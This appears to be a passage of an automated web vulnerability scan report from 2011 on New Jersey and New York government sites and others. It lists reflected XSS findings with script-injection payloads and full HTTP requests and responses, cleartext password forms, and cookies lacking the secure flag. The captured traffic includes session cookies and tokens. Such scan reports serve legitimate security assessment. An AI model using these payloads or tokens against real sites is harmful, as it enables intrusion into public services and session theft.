Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: %2Fportal20.sa.state.nj.us_JSESSIONID=8B7AC0DFAC1D241DA769612C928B4D1F|portal20.sa.state.nj.us|/|iplanet; %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4Sfcy8KCHkif57us6GAU2YZ9vUrrHig0JMuag%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:41:41 GMT
Content-type: application/x-javascript
Last-modified: Sun, 20 Feb 2011 11:58:34 GMT
Accept-ranges: bytes
Content-Length: 17856
Connection: Keep-Alive
Keep-Alive: timeout=50,max=9

/**
* $Id: auth.js,v 1.10.10.1 2007/09/19 02:14:14 la204265 Exp $
* Copyright ? 2005 Sun Microsystems, Inc. All rights reserved.
*
* Sun Microsystems, Inc. has intellectual property rights relati
...[SNIP]...
search(re) != -1) { match = true; }
}
}
return !match;
}//shouldIRewrite

function psSRAPRewriter_convert_expression( aURI )
{
var requestNetworkURI = '';
var requestBaseURI = '2ded1\\';de885b10c60';
var gatewayURI = 'https://portal01.state.nj.us';

if( aURI == null ||
   'string' != ( typeof aURI ) )
{
   return aURI;
}

var splitArray = psSplit( aURI );
if( splitArray[1].le
...[SNIP]...

1.3. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/js/auth.js [psScriptReferrer parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://portal01.state.nj.us
Path:   /http:/portal20.sa.state.nj.us:8080/amserver/js/auth.js

Issue detail

The value of the psScriptReferrer request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e636\'%3b44af179b2e6 was submitted in the psScriptReferrer parameter. This input was echoed as 5e636\\';44af179b2e6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /http:/portal20.sa.state.nj.us:8080/amserver/js/auth.js?psScriptReferrer=5e636\'%3b44af179b2e6 HTTP/1.1
Host: portal01.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:52:33 GMT
Content-type: application/x-javascript
Last-modified: Sun, 20 Feb 2011 11:58:34 GMT
Accept-ranges: bytes
Content-Length: 17856
Connection: close

/**
* $Id: auth.js,v 1.10.10.1 2007/09/19 02:14:14 la204265 Exp $
* Copyright ? 2005 Sun Microsystems, Inc. All rights reserved.
*
* Sun Microsystems, Inc. has intellectual property rights relati
...[SNIP]...
search(re) != -1) { match = true; }
}
}
return !match;
}//shouldIRewrite

function psSRAPRewriter_convert_expression( aURI )
{
var requestNetworkURI = '';
var requestBaseURI = '5e636\\';44af179b2e6';
var gatewayURI = 'https://portal01.state.nj.us';

if( aURI == null ||
   'string' != ( typeof aURI ) )
{
   return aURI;
}

var splitArray = psSplit( aURI );
if( splitArray[1].le
...[SNIP]...

1.4. http://www.nysegov.com/citGuide.cfm [content parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nysegov.com
Path:   /citGuide.cfm

Issue detail

The value of the content request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 408f3"><script>alert(1)</script>940c2cc7b95 was submitted in the content parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /citGuide.cfm?superCat=64&content=main408f3"><script>alert(1)</script>940c2cc7b95 HTTP/1.1
Host: www.nysegov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:50:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

               <html lang="en-US">
               <head>
                   <title>New York State | Citizen Guide</title>
                   
                   <link rel="STYLESHEET" type
...[SNIP]...
<a href="/citGuide.cfm?superCat=64&content=main408f3"><script>alert(1)</script>940c2cc7b95"
                title="Education"
                style="font-weight:bold">
...[SNIP]...

1.5. http://www.nysegov.com/citGuide.cfm [superCat parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nysegov.com
Path:   /citGuide.cfm

Issue detail

The value of the superCat request parameter is copied into an HTML comment. The payload cd85c--><img%20src%3da%20onerror%3dalert(1)>05e117d96e0 was submitted in the superCat parameter. This input was echoed as cd85c--><img src=a onerror=alert(1)>05e117d96e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /citGuide.cfm?superCat=64cd85c--><img%20src%3da%20onerror%3dalert(1)>05e117d96e0 HTTP/1.1
Host: www.nysegov.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:38:09 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<html>
<head>
   <title>Banner Error Handler Page</title>
</head>

<body>
<table background="http://www.nysegov.com/images/pi
...[SNIP]...
<!--

Element 64cd85c--><img src=a onerror=alert(1)>05e117d96e0 is undefined in a CFML structure referenced as part of an expression. <br>
...[SNIP]...

1.6. http://medienfreunde.com/lab/innerfade/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://medienfreunde.com
Path:   /lab/innerfade/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 365d9"><script>alert(1)</script>ec55b53cb71 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /lab/innerfade/ HTTP/1.1
Host: medienfreunde.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: 365d9"><script>alert(1)</script>ec55b53cb71

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm2
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 14717

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<!-- saved from url=(0013)about:internet -->
   <hea
...[SNIP]...
<iframe src="http://pingomatic.com/ping/?title=Flyer&blogurl=365d9"><script>alert(1)</script>ec55b53cb71&rssurl=&chk_weblogscom=on&chk_blogs=on&chk_technorati=on&chk_feedburner=on&chk_syndic8=on&chk_newsgator=on&chk_feedster=on&chk_myyahoo=on&chk_pubsubcom=on&chk_blogdigger=on&chk_blogstreet=on&chk_moreo
...[SNIP]...

2. Cleartext submission of password  previous  next
There are 3 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


2.1. http://visitnj.org/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://visitnj.org
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:15 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: SESS5d506fc80e0e90dcab3fa28ac30949e1=s7maojbbsjalvugal99t5oad66; expires=Fri, 05-Aug-2011 05:24:35 GMT; path=/; domain=.visitnj.org
Last-Modified: Tue, 12 Jul 2011 21:24:03 GMT
ETag: "b64f70a6778aaba742ca2cb12822f6ab"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 48721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"><head>
<meta
...[SNIP]...
<div id="inj-user-login-floater-inner"><form action="/" accept-charset="UTF-8" method="post" id="user-login" class="fancy">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="128" size="60" class="form-text required" />
</div>
...[SNIP]...

2.2. http://www.visitnj.org/events  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitnj.org
Path:   /events

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /events HTTP/1.1
Host: www.visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:44:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: SESS52105c49ef60fb52c401d408f7374085=3vi18nog2bhk3ks4oft736i4p6; expires=Fri, 05-Aug-2011 05:18:03 GMT; path=/; domain=.visitnj.org
Last-Modified: Tue, 12 Jul 2011 21:24:26 GMT
ETag: "1c02c8d04dbc4f40ed09302c3263264b"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 74284

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr"><head>
<meta
...[SNIP]...
<div id="inj-user-login-floater-inner"><form action="/events" accept-charset="UTF-8" method="post" id="user-login" class="fancy">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="128" size="60" class="form-text required" />
</div>
...[SNIP]...

2.3. http://www.visitnj.org/new-jerseys-wineries  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.visitnj.org
Path:   /new-jerseys-wineries

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /new-jerseys-wineries HTTP/1.1
Host: www.visitnj.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:44:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.3.4
Set-Cookie: SESS52105c49ef60fb52c401d408f7374085=ordncjvbe1of8k89jthuie26j7; expires=Fri, 05-Aug-2011 05:18:03 GMT; path=/; domain=.visitnj.org
Last-Modified: Tue, 12 Jul 2011 22:00:07 GMT
ETag: "fcfdc2bb205847c6a67cce0b8add1bc2"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 42712

<table align="center" border="1" cellspacing="0" style="background:white;color:black;width:80%;"><tr><th colspan="2"> Database Error</th></tr>
<tr><td align="right" valign="top">Message:</td><td>[<b>M
...[SNIP]...
<div id="inj-user-login-floater-inner"><form action="/new-jerseys-wineries" accept-charset="UTF-8" method="post" id="user-login" class="fancy">
<div>
...[SNIP]...
</label>
<input type="password" name="pass" id="edit-pass" maxlength="128" size="60" class="form-text required" />
</div>
...[SNIP]...

3. SSL cookie without secure flag set  previous  next
There are 13 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


3.1. https://www.mybenefits.ny.gov/  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.mybenefits.ny.gov
Path:   /

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.mybenefits.ny.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Wed, 13 Jul 2011 01:50:09 GMT
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Liferay-Portal: Liferay Portal Enterprise Edition 6.0 EE SP1 (Bunyan / Build 6011 / January 13, 2011)
ETag: "3bf491b4"
Content-Type: text/html;charset=UTF-8
Content-Length: 33290
Set-Cookie: JSESSIONID=5E672420895F3B98A26F8AFC3DE47B0C; Path=/
Set-Cookie: GUEST_LANGUAGE_ID=en_US; Expires=Thu, 12-Jul-2012 01:50:10 GMT; Path=/
Set-Cookie: COOKIE_SUPPORT=true; Expires=Thu, 12-Jul-2012 01:50:10 GMT; Path=/
Set-Cookie: I4WEB_IID=1677;path=/;
Set-Cookie: PPortalROUTEID=.3; path=/
Connection: close

<!DOCTYPE html> <html class="ltr" dir="ltr" lang="en-US"><script LANGUAGE="JavaScript1.2">
<!--
// Precise/Indepth For Web code v9.0
if (typeof(TextDate) == 'undefined' && location.host != "") {va
...[SNIP]...

3.2. https://www1.state.nj.us/TYTR_Saver/jsp/common/Login.jsp  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www1.state.nj.us
Path:   /TYTR_Saver/jsp/common/Login.jsp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TYTR_Saver/jsp/common/Login.jsp HTTP/1.1
Host: www1.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:45 GMT
Content-type: text/html
Set-cookie: JSESSIONID=212f7dfab86ed2f492b92e02d519;Path=/TYTR_Saver
Set-cookie: JROUTE=Wr84;Path=/TYTR_Saver
Connection: close


<HTML>
<head>
<!--
<TITLE>File Your NJ SAVER Online! - NJ Taxation</TITLE>
-->
<TITLE>File Your Homestead Benefit Online</TITLE>
<!--<LINK REL="stylesheet" HREF
...[SNIP]...

3.3. https://maps-api-ssl.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://maps-api-ssl.google.com
Path:   /maps

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:15 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Set-Cookie: PREF=ID=19674e168110c698:U=17ea5243225a615b:TM=1308589662:LM=1310521935:S=34g7y1Dpote6i-Qu; expires=Fri, 12-Jul-2013 01:52:15 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...

3.4. https://market.android.com/reviews/components  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://market.android.com
Path:   /reviews/components

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /reviews/components HTTP/1.1
Host: market.android.com
Connection: keep-alive
Referer: https://market.android.com/details?id=com.avai.amp.pbn_delaware
Content-Length: 339
Origin: https://market.android.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

req={"appId":54,"reqId":"1310522401955-0.8032410256564617","hl":"en_US","js":true,"specs":[{"type":"0","url":"3","groups":"4","id":"1"},{"type":"0","url":"3","groups":"4","id":"2"}],"internedKeys":["0
...[SNIP]...

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Wed, 13 Jul 2011 02:00:20 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Set-Cookie: PREF=ID=9cae866da36d6f34:U=c20011dc93789892:TM=1310522402:LM=1310522420:S=mLzmlvNZoj-H6Lpz; expires=Fri, 12-Jul-2013 02:00:20 GMT; path=/; domain=market.android.com
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Server: zfe
Content-Length: 1308
X-XSS-Protection: 1; mode=block

window.google.annotations2.component.load({'1':{'augmentor':function(){var h=window.google.annotations2.component;var k=function(e,b,d,c){for(var g=0,a;a=e.childNodes[g];++g)if(a.nodeType==1){var f=a.
...[SNIP]...

3.5. https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/amserver/UI/Login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://portal01.state.nj.us
Path:   /http://portal20.sa.state.nj.us:8080/amserver/UI/Login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /http://portal20.sa.state.nj.us:8080/amserver/UI/Login?gw=portal01.state.nj.us&org=snj HTTP/1.1
Host: portal01.state.nj.us
Connection: keep-alive
Referer: http://nj.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:41:04 GMT
Content-type: text/html;charset=UTF-8
Cache-control: private
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-12
Am_client_type: Mozilla
Set-Cookie: %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4SfcwBgv24XJbQ4NKEBvqh8qUMkdDvgelWROk%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Set-Cookie: %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Content-Length: 6736
Connection: Keep-Alive
Keep-Alive: timeout=50,max=9


<html>


<head>
<title>Log On To myNewJersey</title>


<link rel="stylesheet" href="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/oit/styles/mynj3.css" type="text/css">
<
...[SNIP]...

3.6. https://portal01.state.nj.us/http:/portal20.sa.state.nj.us:8080/amserver/UI/Login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://portal01.state.nj.us
Path:   /http:/portal20.sa.state.nj.us:8080/amserver/UI/Login

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /http:/portal20.sa.state.nj.us:8080/amserver/UI/Login HTTP/1.1
Host: portal01.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:52:28 GMT
Content-type: text/html;charset=UTF-8
Cache-control: private
Expires: 0
X-dsameversion: 7 2005Q4 patch 120954-12
Am_client_type: genericHTML
Set-Cookie: %2F.state.nj.us_AMAuthCookie=AQIC5wM2LY4Sfcy8cIdgoahtAXnAW%252F3%252FPfpm4q%252F9mG8Zu5U%253D%2540AAJTSQACMDE%253D%2523|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Set-Cookie: %2F.state.nj.us_amlbcookie=01|.state.nj.us|/|iplanet; domain=.state.nj.us; path=/
Content-Length: 6736
Connection: close


<html>


<head>
<title>Log On To myNewJersey</title>


<link rel="stylesheet" href="https://portal01.state.nj.us/http://portal20.sa.state.nj.us:8080/oit/styles/mynj3.css" type="text/css">
<
...[SNIP]...

3.7. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/css/main.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/css/main.css

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/css/main.css HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MBJT=3X-GjNMfSpxZg4AcdSyRyWoKGL1SXlVlZak_4S69Ys_sq5o29-TPKZg; selectedStore1=Lowe's Of Brooklyn## NY|1674|4|11215|no|Y|118 2nd Avenue|Brooklyn|M-Sa 6 Am - Midnight## Su 8 Am - 10 Pm|(718) 249-1151|(718) 249-1152|ZK; WC_PERSISTENT=lqKgTvyXs59OqiWHtkQYsR6yqww%3d%0a%3b2011%2d07%2d12+17%3a30%3a53%2e805%5f1310506253758%2d32392%5f10151%5f%2d1002%2c%2d1%2cUSD%5f10151; LowesSearchSessionFacade=%7B%22articlesPerPage%22%3A0%2C%22productsPerPage%22%3A0%7D; cmSessionDepth=5; JSESSIONID=00006p0iP0nvmoy5cq0R483AFmL:14e1gr6ig; WC_SESSION_ESTABLISHED=true; WC_AUTHENTICATION_-1002=%2d1002%2cTYVD85anmjhYyITkSpmh9zJVTEc%3d; WC_ACTIVEPOINTER=%2d1%2c10151; WC_USERACTIVITY_-1002=%2d1002%2c10151%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2czavDyvRAPLOMLbNZ9U%2brj7uHCuulaXU18t%2fO%2fSx3lFn%2f45taoGYDYucxz4%2fp6B8TyvbcdVzvDpby%0a%2feY9VaffAc4y09NidpOD25XJ20Mzq3kFHMtHKZG5cVZbMeQ1YmOSeUpTBUkQnCB6RygNDVVlHA%3d%3d; WC_GENERIC_ACTIVITYDATA=[2897564122%3atrue%3afalse%3a0%3aOT%2bvDkUlulLUJRWcNU3dyXdQe3g%3d][com.ibm.commerce.context.base.BaseContext|10151%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10051%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|10005%2610005%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null][com.ibm.commerce.gifregistry.context.GiftRegistryContext|null%26null%26null]; TS176ebc=213d8656075767f35a1f9b520e396fbdceb6ace724ef15e34e1cfb7e; stop_mobi=yes

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 05 Jul 2011 17:15:57 GMT
Accept-Ranges: bytes
Content-Type: text/css
Content-Length: 238055
Expires: Wed, 13 Jul 2011 02:03:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 13 Jul 2011 02:03:06 GMT
Connection: keep-alive
Vary: Accept-Encoding
Set-Cookie: akaau=1310524386~id=21017306f05776f813565f0d22f0d790; path=/

/* Reset CSS */
body,div,dl,dt,dd,ul,ol,li,h1,h2,h3,h4,h5,h6,pre,form,fieldset,input,textarea,p,blockquote,th,td,button{margin:0;padding:0}table{border-collapse:collapse;border-spacing:0}fieldset,img
...[SNIP]...

3.8. https://www.lowes.com/wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.lowes.com
Path:   /wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wcsstore/B2BDirectStorefrontAssetStore/javascript/common.js HTTP/1.1
Host: www.lowes.com
Connection: keep-alive
Referer: https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm?langId=-1&storeId=10151&catalogId=10051&krypto=w37ixU9mxd51c2GEFG7BpBTiHMF%2BPtrjg%2F5ZFfDHXjuTogRqSuGR4efV6fa7g5SaSXQQW3naq2iX%0AFpd3O3L2OA%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
